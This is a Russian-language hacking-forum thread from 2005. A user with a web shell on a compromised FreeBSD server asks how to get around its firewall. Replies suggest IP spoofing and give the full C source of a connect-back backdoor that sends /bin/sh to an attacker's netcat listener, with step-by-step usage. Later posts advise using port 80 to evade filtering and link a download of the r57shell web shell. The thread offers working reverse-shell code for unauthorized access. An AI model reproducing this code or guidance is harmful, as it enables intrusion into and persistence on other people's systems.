HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность > *nix
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Обойти фаерволл в FreeBSD
  #1  
Старый 23.12.2005, 14:00
scorpion
Новичок
Регистрация: 06.12.2005
Сообщений: 24
С нами: 10751274

Репутация: 0
Cool Обойти фаерволл в FreeBSD

Короче висит операционка FreeBSD.У мя есть веб шелл с правами nobody.На системе мне можно применять команду perl.Я когда запускаю какой-нить бинд шелл,то этот порт открывается(видно при команде show opened ports).Но подключиться к этому порту не могу.Интуиция подсказывает на 100%,что там сидит фаерволл.С помощью какого бинд шелла мне его обойти???И где достать этот шелл?
 

  #2  
Старый 23.12.2005, 16:03
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
С нами: 11298566

Репутация: 761


По умолчанию

Это во многом зависит от настройки фаервола. Думаю нужно рулить в сторону спуфинга (обычно для локалхоста или локалки разришают больше, чем для интернета), но если в правилах обазначенны устройства (via lo0, via tun0 и тд и тп), то ничего из спуфинга не выйдет.
Подделка ip не даст тебе коннекта на тот комп (вывод не будет возаращатся тебе), но, возможно, ты сможешь выполнять команды (слепо).
:]
 

  #3  
Старый 23.12.2005, 18:26
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

scorpion, юзай Connect-Back Backdoor.
bdw.c
Цитата:
/* Digit-Labs Connect-Back Backdoor
*
* Use this backdoor to access
* machines behind firewalls.
*
* step 1. setup a listening port
* on your box e.g.
* nc -l -p 4000
*
* step 2. Run this file :
* ./cbd <ip_of_listening_machine>
*
* grazer@digit-labs.org
* http://www.digit-labs.org
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>

#include <netinet/in.h>
#include <netdb.h>

int fd, sock;
int port = 4000;
struct sockaddr_in addr;

char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n * Connected to CommandLine...\n";
char shell[] = "/bin/sh";

int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n\n %s <ip> \n\n", argv[0]);
exit(0);
}


addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);

if(connect(fd, (struct sockaddr*)&addr, sizeof(addr))<0)printf("fucker!\n");

send(fd, mesg, sizeof(mesg), 0);

dup2(fd, 0); // thnx dvorak
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);


close(fd);


return 1;
}
Есть еще пару способов, но этот самый простой...
 

  #4  
Старый 23.12.2005, 18:31
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
С нами: 11298566

Репутация: 761


По умолчанию

Что-то я стормозил... Дейсвительно, так проще. :]
 

  #5  
Старый 24.12.2005, 00:09
scorpion
Новичок
Регистрация: 06.12.2005
Сообщений: 24
С нами: 10751274

Репутация: 0
По умолчанию

Спасибо вам fucker"ok и virgoz
Обоим по +1 репутации )))
 

  #6  
Старый 24.12.2005, 00:26
scorpion
Новичок
Регистрация: 06.12.2005
Сообщений: 24
С нами: 10751274

Репутация: 0
По умолчанию

VIRGOZ

Слушь как я понял:Мне надо на своём винте запустить nc -l -p 4000 .А на взломаном сервере мне надо будет сделать ./bdw <мой IP> .Прав я???
 

  #7  
Старый 24.12.2005, 01:48
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

scorpion, можно и так. Но для безопасности, я бы запускал netcat на серваке.
 

  #8  
Старый 26.12.2005, 15:02
SladerNon
Banned
Регистрация: 06.03.2005
Сообщений: 1,645
С нами: 11147366

Репутация: 901


По умолчанию

Добавить можно то, что если back-connect делать на жестко зафорваленной машине, имеет смысл на общедоступных портах...
Топишь как правило 80 порт тут прокатит..
 

  #9  
Старый 29.12.2005, 01:26
scorpion
Новичок
Регистрация: 06.12.2005
Сообщений: 24
С нами: 10751274

Репутация: 0
По умолчанию

Слушайте есть ли такой back connect на перл языке.Просто дело в том,что у меня нет прав ./file А запускать перл файл без проблем.Так что мне нужно,чтоб я на своей системе запустил бы nc -l -p 666 ,а на сервере запустил бы перл шелл,который бы подключился бы на мою тачку и так бы я обошёл firewall.Кто-нить можете помочь???

Где взять такой перл шелл???

P.S За хорошую помощь поднимаю репутацию всегда...
 

  #10  
Старый 29.12.2005, 03:10
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
С нами: 11298566

Репутация: 761


По умолчанию

А разве твой шел не от rst ?
Цитата:
Сообщение от r57shell v1.23  
bla bla bla
~ возможность делать back-connect с помощью Perl или С кода
bla bla bla
http://rst.void.ru/index.php?page=releases
http://rst.void.ru/download/r57shell.txt
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подделка IP Ekstazi Уязвимости 6 11.10.2006 21:10
Как обойти сканер со значком ' Thief Уязвимости CMS / форумов 2 21.04.2005 12:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору. Комиссия форума: 2%.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...